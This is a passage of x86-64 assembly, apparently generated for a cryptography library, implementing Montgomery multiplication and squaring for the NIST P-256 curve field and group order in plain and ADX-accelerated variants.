cmovzq %r12,%r11
movq %r10,16(%rdi)
movq %r11,24(%rdi)
movq 0(%rsp),%r13
movq 8(%rsp),%r12
leaq 16(%rsp),%rsp
L$neg_epilogue:
ret
.globl _ecp_nistz256_ord_mul_mont_nohw
.private_extern _ecp_nistz256_ord_mul_mont_nohw
.p2align 5
_ecp_nistz256_ord_mul_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_mul_body:
movq 0(%rdx),%rax
movq %rdx,%rbx
leaq L$ord(%rip),%r14
movq L$ordK(%rip),%r15
movq %rax,%rcx
mulq 0(%rsi)
movq %rax,%r8
movq %rcx,%rax
movq %rdx,%r9
mulq 8(%rsi)
addq %rax,%r9
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%r10
mulq 16(%rsi)
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %r8,%r13
imulq %r15,%r8
movq %rdx,%r11
mulq 24(%rsi)
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%r12
mulq 0(%r14)
movq %r8,%rbp
addq %rax,%r13
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%rcx
subq %r8,%r10
sbbq $0,%r8
mulq 8(%r14)
addq %rcx,%r9
adcq $0,%rdx
addq %rax,%r9
movq %rbp,%rax
adcq %rdx,%r10
movq %rbp,%rdx
adcq $0,%r8
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r11
movq 8(%rbx),%rax
sbbq %rdx,%rbp
addq %r8,%r11
adcq %rbp,%r12
adcq $0,%r13
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r9
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %r9,%rcx
imulq %r15,%r9
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r12
adcq $0,%rdx
xorq %r8,%r8
addq %rax,%r12
movq %r9,%rax
adcq %rdx,%r13
adcq $0,%r8
mulq 0(%r14)
movq %r9,%rbp
addq %rax,%rcx
movq %r9,%rax
adcq %rdx,%rcx
subq %r9,%r11
sbbq $0,%r9
mulq 8(%r14)
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rbp,%rax
adcq %rdx,%r11
movq %rbp,%rdx
adcq $0,%r9
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r12
movq 16(%rbx),%rax
sbbq %rdx,%rbp
addq %r9,%r12
adcq %rbp,%r13
adcq $0,%r8
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rcx,%rax
adcq $0,%rdx
movq %r10,%rcx
imulq %r15,%r10
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r13
adcq $0,%rdx
xorq %r9,%r9
addq %rax,%r13
movq %r10,%rax
adcq %rdx,%r8
adcq $0,%r9
mulq 0(%r14)
movq %r10,%rbp
addq %rax,%rcx
movq %r10,%rax
adcq %rdx,%rcx
subq %r10,%r12
sbbq $0,%r10
mulq 8(%r14)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq %rdx,%r12
movq %rbp,%rdx
adcq $0,%r10
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r13
movq 24(%rbx),%rax
sbbq %rdx,%rbp
addq %r10,%r13
adcq %rbp,%r8
adcq $0,%r9
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r13
adcq $0,%rdx
addq %rax,%r13
movq %rcx,%rax
adcq $0,%rdx
movq %r11,%rcx
imulq %r15,%r11
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r8
adcq $0,%rdx
xorq %r10,%r10
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
adcq $0,%r10
mulq 0(%r14)
movq %r11,%rbp
addq %rax,%rcx
movq %r11,%rax
adcq %rdx,%rcx
subq %r11,%r13
sbbq $0,%r11
mulq 8(%r14)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq %rdx,%r13
movq %rbp,%rdx
adcq $0,%r11
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r8
sbbq %rdx,%rbp
addq %r11,%r8
adcq %rbp,%r9
adcq $0,%r10
movq %r12,%rsi
subq 0(%r14),%r12
movq %r13,%r11
sbbq 8(%r14),%r13
movq %r8,%rcx
sbbq 16(%r14),%r8
movq %r9,%rbp
sbbq 24(%r14),%r9
sbbq $0,%r10
cmovcq %rsi,%r12
cmovcq %r11,%r13
cmovcq %rcx,%r8
cmovcq %rbp,%r9
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_mul_epilogue:
ret
.globl _ecp_nistz256_ord_sqr_mont_nohw
.private_extern _ecp_nistz256_ord_sqr_mont_nohw
.p2align 5
_ecp_nistz256_ord_sqr_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_sqr_body:
movq 0(%rsi),%r8
movq 8(%rsi),%rax
movq 16(%rsi),%r14
movq 24(%rsi),%r15
leaq L$ord(%rip),%rsi
movq %rdx,%rbx
jmp L$oop_ord_sqr
.p2align 5
L$oop_ord_sqr:
movq %rax,%rbp
mulq %r8
movq %rax,%r9
.byte 102,72,15,110,205
movq %r14,%rax
movq %rdx,%r10
mulq %r8
addq %rax,%r10
movq %r15,%rax
.byte 102,73,15,110,214
adcq $0,%rdx
movq %rdx,%r11
mulq %r8
addq %rax,%r11
movq %r15,%rax
.byte 102,73,15,110,223
adcq $0,%rdx
movq %rdx,%r12
mulq %r14
movq %rax,%r13
movq %r14,%rax
movq %rdx,%r14
mulq %rbp
addq %rax,%r11
movq %r15,%rax
adcq $0,%rdx
movq %rdx,%r15
mulq %rbp
addq %rax,%r12
adcq $0,%rdx
addq %r15,%r12
adcq %rdx,%r13
adcq $0,%r14
xorq %r15,%r15
movq %r8,%rax
addq %r9,%r9
adcq %r10,%r10
adcq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
adcq %r14,%r14
adcq $0,%r15
mulq %rax
movq %rax,%r8
.byte 102,72,15,126,200
movq %rdx,%rbp
mulq %rax
addq %rbp,%r9
adcq %rax,%r10
.byte 102,72,15,126,208
adcq $0,%rdx
movq %rdx,%rbp
mulq %rax
addq %rbp,%r11
adcq %rax,%r12
.byte 102,72,15,126,216
adcq $0,%rdx
movq %rdx,%rbp
movq %r8,%rcx
imulq 32(%rsi),%r8
mulq %rax
addq %rbp,%r13
adcq %rax,%r14
movq 0(%rsi),%rax
adcq %rdx,%r15
mulq %r8
movq %r8,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r8,%r10
sbbq $0,%rbp
mulq %r8
addq %rcx,%r9
adcq $0,%rdx
addq %rax,%r9
movq %r8,%rax
adcq %rdx,%r10
movq %r8,%rdx
adcq $0,%rbp
movq %r9,%rcx
imulq 32(%rsi),%r9
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r11
movq 0(%rsi),%rax
sbbq %rdx,%r8
addq %rbp,%r11
adcq $0,%r8
mulq %r9
movq %r9,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r9,%r11
sbbq $0,%rbp
mulq %r9
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %r9,%rax
adcq %rdx,%r11
movq %r9,%rdx
adcq $0,%rbp
movq %r10,%rcx
imulq 32(%rsi),%r10
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r8
movq 0(%rsi),%rax
sbbq %rdx,%r9
addq %rbp,%r8
adcq $0,%r9
mulq %r10
movq %r10,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r10,%r8
sbbq $0,%rbp
mulq %r10
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %r10,%rax
adcq %rdx,%r8
movq %r10,%rdx
adcq $0,%rbp
movq %r11,%rcx
imulq 32(%rsi),%r11
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r9
movq 0(%rsi),%rax
sbbq %rdx,%r10
addq %rbp,%r9
adcq $0,%r10
mulq %r11
movq %r11,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r11,%r9
sbbq $0,%rbp
mulq %r11
addq %rcx,%r8
adcq $0,%rdx
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
movq %r11,%rdx
adcq $0,%rbp
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r10
sbbq %rdx,%r11
addq %rbp,%r10
adcq $0,%r11
xorq %rdx,%rdx
addq %r12,%r8
adcq %r13,%r9
movq %r8,%r12
adcq %r14,%r10
adcq %r15,%r11
movq %r9,%rax
adcq $0,%rdx
subq 0(%rsi),%r8
movq %r10,%r14
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r11,%r15
sbbq 24(%rsi),%r11
sbbq $0,%rdx
cmovcq %r12,%r8
cmovncq %r9,%rax
cmovncq %r10,%r14
cmovncq %r11,%r15
decq %rbx
jnz L$oop_ord_sqr
movq %r8,0(%rdi)
movq %rax,8(%rdi)
pxor %xmm1,%xmm1
movq %r14,16(%rdi)
pxor %xmm2,%xmm2
movq %r15,24(%rdi)
pxor %xmm3,%xmm3
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_sqr_epilogue:
ret
.globl _ecp_nistz256_ord_mul_mont_adx
.private_extern _ecp_nistz256_ord_mul_mont_adx
.p2align 5
_ecp_nistz256_ord_mul_mont_adx:
L$ecp_nistz256_ord_mul_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_mulx_body:
movq %rdx,%rbx
movq 0(%rdx),%rdx
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
leaq -128(%rsi),%rsi
leaq L$ord-128(%rip),%r14
movq L$ordK(%rip),%r15
mulxq %r9,%r8,%r9
mulxq %r10,%rcx,%r10
mulxq %r11,%rbp,%r11
addq %rcx,%r9
mulxq %r12,%rcx,%r12
movq %r8,%rdx
mulxq %r15,%rdx,%rax
adcq %rbp,%r10
adcq %rcx,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 24+128(%r14),%rcx,%rbp
movq 8(%rbx),%rdx
adcxq %rcx,%r11
adoxq %rbp,%r12
adcxq %r8,%r12
adoxq %r8,%r13
adcq $0,%r13
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 24+128(%rsi),%rcx,%rbp
movq %r9,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r12
adoxq %rbp,%r13
adcxq %r8,%r13
adoxq %r8,%r8
adcq $0,%r8
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 24+128(%r14),%rcx,%rbp
movq 16(%rbx),%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcxq %r9,%r13
adoxq %r9,%r8
adcq $0,%r8
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%rsi),%rcx,%rbp
movq %r10,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r13
adoxq %rbp,%r8
adcxq %r9,%r8
adoxq %r9,%r9
adcq $0,%r9
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%r14),%rcx,%rbp
movq 24(%rbx),%rdx
adcxq %rcx,%r13
adoxq %rbp,%r8
adcxq %r10,%r8
adoxq %r10,%r9
adcq $0,%r9
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%rsi),%rcx,%rbp
movq %r11,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r8
adoxq %rbp,%r9
adcxq %r10,%r9
adoxq %r10,%r10
adcq $0,%r10
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%r14),%rcx,%rbp
leaq 128(%r14),%r14
movq %r12,%rbx
adcxq %rcx,%r8
adoxq %rbp,%r9
movq %r13,%rdx
adcxq %r11,%r9
adoxq %r11,%r10
adcq $0,%r10
movq %r8,%rcx
subq 0(%r14),%r12
sbbq 8(%r14),%r13
sbbq 16(%r14),%r8
movq %r9,%rbp
sbbq 24(%r14),%r9
sbbq $0,%r10
cmovcq %rbx,%r12
cmovcq %rdx,%r13
cmovcq %rcx,%r8
cmovcq %rbp,%r9
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_mulx_epilogue:
ret
.globl _ecp_nistz256_ord_sqr_mont_adx
.private_extern _ecp_nistz256_ord_sqr_mont_adx
.p2align 5
_ecp_nistz256_ord_sqr_mont_adx:
_CET_ENDBR
L$ecp_nistz256_ord_sqr_mont_adx:
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_sqrx_body:
movq %rdx,%rbx
movq 0(%rsi),%rdx
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
leaq L$ord(%rip),%rsi
jmp L$oop_ord_sqrx
.p2align 5
L$oop_ord_sqrx:
mulxq %r14,%r9,%r10
mulxq %r15,%rcx,%r11
movq %rdx,%rax
.byte 102,73,15,110,206
mulxq %r8,%rbp,%r12
movq %r14,%rdx
addq %rcx,%r10
.byte 102,73,15,110,215
adcq %rbp,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq %r15,%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq %r8,%rcx,%rbp
movq %r15,%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcq $0,%r13
mulxq %r8,%rcx,%r14
movq %rax,%rdx
.byte 102,73,15,110,216
xorq %r15,%r15
adcxq %r9,%r9
adoxq %rcx,%r13
adcxq %r10,%r10
adoxq %r15,%r14
mulxq %rdx,%r8,%rbp
.byte 102,72,15,126,202
adcxq %r11,%r11
adoxq %rbp,%r9
adcxq %r12,%r12
mulxq %rdx,%rcx,%rax
.byte 102,72,15,126,210
adcxq %r13,%r13
adoxq %rcx,%r10
adcxq %r14,%r14
mulxq %rdx,%rcx,%rbp
.byte 0x67
.byte 102,72,15,126,218
adoxq %rax,%r11
adcxq %r15,%r15
adoxq %rcx,%r12
adoxq %rbp,%r13
mulxq %rdx,%rcx,%rax
adoxq %rcx,%r14
adoxq %rax,%r15
movq %r8,%rdx
mulxq 32(%rsi),%rdx,%rcx
xorq %rax,%rax
mulxq 0(%rsi),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 8(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 16(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 24(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r8
adcxq %rax,%r8
movq %r9,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adoxq %rcx,%r9
adcxq %rbp,%r10
mulxq 8(%rsi),%rcx,%rbp
adoxq %rcx,%r10
adcxq %rbp,%r11
mulxq 16(%rsi),%rcx,%rbp
adoxq %rcx,%r11
adcxq %rbp,%r8
mulxq 24(%rsi),%rcx,%rbp
adoxq %rcx,%r8
adcxq %rbp,%r9
adoxq %rax,%r9
movq %r10,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r8
mulxq 16(%rsi),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 24(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
adcxq %rax,%r10
movq %r11,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adoxq %rcx,%r11
adcxq %rbp,%r8
mulxq 8(%rsi),%rcx,%rbp
adoxq %rcx,%r8
adcxq %rbp,%r9
mulxq 16(%rsi),%rcx,%rbp
adoxq %rcx,%r9
adcxq %rbp,%r10
mulxq 24(%rsi),%rcx,%rbp
adoxq %rcx,%r10
adcxq %rbp,%r11
adoxq %rax,%r11
addq %r8,%r12
adcq %r13,%r9
movq %r12,%rdx
adcq %r14,%r10
adcq %r15,%r11
movq %r9,%r14
adcq $0,%rax
subq 0(%rsi),%r12
movq %r10,%r15
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r11,%r8
sbbq 24(%rsi),%r11
sbbq $0,%rax
cmovncq %r12,%rdx
cmovncq %r9,%r14
cmovncq %r10,%r15
cmovncq %r11,%r8
decq %rbx
jnz L$oop_ord_sqrx
movq %rdx,0(%rdi)
movq %r14,8(%rdi)
pxor %xmm1,%xmm1
movq %r15,16(%rdi)
pxor %xmm2,%xmm2
movq %r8,24(%rdi)
pxor %xmm3,%xmm3
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_sqrx_epilogue:
ret
.globl _ecp_nistz256_mul_mont_nohw
.private_extern _ecp_nistz256_mul_mont_nohw
.p2align 5
_ecp_nistz256_mul_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$mul_body:
movq %rdx,%rbx
movq 0(%rdx),%rax
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
call __ecp_nistz256_mul_montq
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$mul_epilogue:
ret
.p2align 5
__ecp_nistz256_mul_montq:
movq %rax,%rbp
mulq %r9
movq L$poly+8(%rip),%r14
movq %rax,%r8
movq %rbp,%rax
movq %rdx,%r9
mulq %r10
movq L$poly+24(%rip),%r15
addq %rax,%r9
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %r11
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %r12
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
xorq %r13,%r13
movq %rdx,%r12
movq %r8,%rbp
shlq $32,%r8
mulq %r15
shrq $32,%rbp
addq %r8,%r9
adcq %rbp,%r10
adcq %rax,%r11
movq 8(%rbx),%rax
adcq %rdx,%r12
adcq $0,%r13
xorq %r8,%r8
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r9
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %r9,%rax
adcq %rdx,%r13
adcq $0,%r8
movq %r9,%rbp
shlq $32,%r9
mulq %r15
shrq $32,%rbp
addq %r9,%r10
adcq %rbp,%r11
adcq %rax,%r12
movq 16(%rbx),%rax
adcq %rdx,%r13
adcq $0,%r8
xorq %r9,%r9
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r13
adcq $0,%rdx
addq %rax,%r13
movq %r10,%rax
adcq %rdx,%r8
adcq $0,%r9
movq %r10,%rbp
shlq $32,%r10
mulq %r15
shrq $32,%rbp
addq %r10,%r11
adcq %rbp,%r12
adcq %rax,%r13
movq 24(%rbx),%rax
adcq %rdx,%r8
adcq $0,%r9
xorq %r10,%r10
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r13
adcq $0,%rdx
addq %rax,%r13
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r8
adcq $0,%rdx
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
adcq $0,%r10
movq %r11,%rbp
shlq $32,%r11
mulq %r15
shrq $32,%rbp
addq %r11,%r12
adcq %rbp,%r13
movq %r12,%rcx
adcq %rax,%r8
adcq %rdx,%r9
movq %r13,%rbp
adcq $0,%r10
subq $-1,%r12
movq %r8,%rbx
sbbq %r14,%r13
sbbq $0,%r8
movq %r9,%rdx
sbbq %r15,%r9
sbbq $0,%r10
cmovcq %rcx,%r12
cmovcq %rbp,%r13
movq %r12,0(%rdi)
cmovcq %rbx,%r8
movq %r13,8(%rdi)
cmovcq %rdx,%r9
movq %r8,16(%rdi)
movq %r9,24(%rdi)
ret
.globl _ecp_nistz256_sqr_mont_nohw
.private_extern _ecp_nistz256_sqr_mont_nohw
.p2align 5
_ecp_nistz256_sqr_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$sqr_body:
movq 0(%rsi),%rax
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
call __ecp_nistz256_sqr_montq
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$sqr_epilogue:
ret
.p2align 5
__ecp_nistz256_sqr_montq:
movq %rax,%r13
mulq %r14
movq %rax,%r9
movq %r15,%rax
movq %rdx,%r10
mulq %r13
addq %rax,%r10
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %r13
addq %rax,%r11
movq %r15,%rax
adcq $0,%rdx
movq %rdx,%r12
mulq %r14
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq %r14
addq %rax,%r12
movq %r8,%rax
adcq $0,%rdx
addq %rbp,%r12
movq %rdx,%r13
adcq $0,%r13
mulq %r15
xorq %r15,%r15
addq %rax,%r13
movq 0(%rsi),%rax
movq %rdx,%r14
adcq $0,%r14
addq %r9,%r9
adcq %r10,%r10
adcq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
adcq %r14,%r14
adcq $0,%r15
mulq %rax
movq %rax,%r8
movq 8(%rsi),%rax
movq %rdx,%rcx
mulq %rax
addq %rcx,%r9
adcq %rax,%r10
movq 16(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq %rax
addq %rcx,%r11
adcq %rax,%r12
movq 24(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq %rax
addq %rcx,%r13
adcq %rax,%r14
movq %r8,%rax
adcq %rdx,%r15
movq L$poly+8(%rip),%rsi
movq L$poly+24(%rip),%rbp
movq %r8,%rcx
shlq $32,%r8
mulq %rbp
shrq $32,%rcx
addq %r8,%r9
adcq %rcx,%r10
adcq %rax,%r11
movq %r9,%rax
adcq $0,%rdx
movq %r9,%rcx
shlq $32,%r9
movq %rdx,%r8
mulq %rbp
shrq $32,%rcx
addq %r9,%r10
adcq %rcx,%r11
adcq %rax,%r8
movq %r10,%rax
adcq $0,%rdx
movq %r10,%rcx
shlq $32,%r10
movq %rdx,%r9
mulq %rbp
shrq $32,%rcx
addq %r10,%r11
adcq %rcx,%r8
adcq %rax,%r9
movq %r11,%rax
adcq $0,%rdx
movq %r11,%rcx
shlq $32,%r11
movq %rdx,%r10
mulq %rbp
shrq $32,%rcx
addq %r11,%r8
adcq %rcx,%r9
adcq %rax,%r10
adcq $0,%rdx
xorq %r11,%r11
addq %r8,%r12
adcq %r9,%r13
movq %r12,%r8
adcq %r10,%r14
adcq %rdx,%r15
movq %r13,%r9
adcq $0,%r11
subq $-1,%r12
movq %r14,%r10
sbbq %rsi,%r13
sbbq $0,%r14
movq %r15,%rcx
sbbq %rbp,%r15
sbbq $0,%r11
cmovcq %r8,%r12
cmovcq %r9,%r13
movq %r12,0(%rdi)
cmovcq %r10,%r14
movq %r13,8(%rdi)
cmovcq %rcx,%r15
movq %r14,16(%rdi)
movq %r15,24(%rdi)
ret
.globl _ecp_nistz256_mul_mont_adx
.private_extern _ecp_nistz256_mul_mont_adx
.p2align 5
_ecp_nistz256_mul_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$mulx_body:
movq %rdx,%rbx
movq 0(%rdx),%rdx
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
leaq -128(%rsi),%rsi
call __ecp_nistz256_mul_montx
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$mulx_epilogue:
ret
.p2align 5
__ecp_nistz256_mul_montx:
mulxq %r9,%r8,%r9
mulxq %r10,%rcx,%r10
movq $32,%r14
xorq %r13,%r13
mulxq %r11,%rbp,%r11
movq L$poly+24(%rip),%r15
adcq %rcx,%r9
mulxq %r12,%rcx,%r12
movq %r8,%rdx
adcq %rbp,%r10
shlxq %r14,%r8,%rbp
adcq %rcx,%r11
shrxq %r14,%r8,%rcx
adcq $0,%r12
addq %rbp,%r9
adcq %rcx,%r10
mulxq %r15,%rcx,%rbp
movq 8(%rbx),%rdx
adcq %rcx,%r11
adcq %rbp,%r12
adcq $0,%r13
xorq %r8,%r8
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
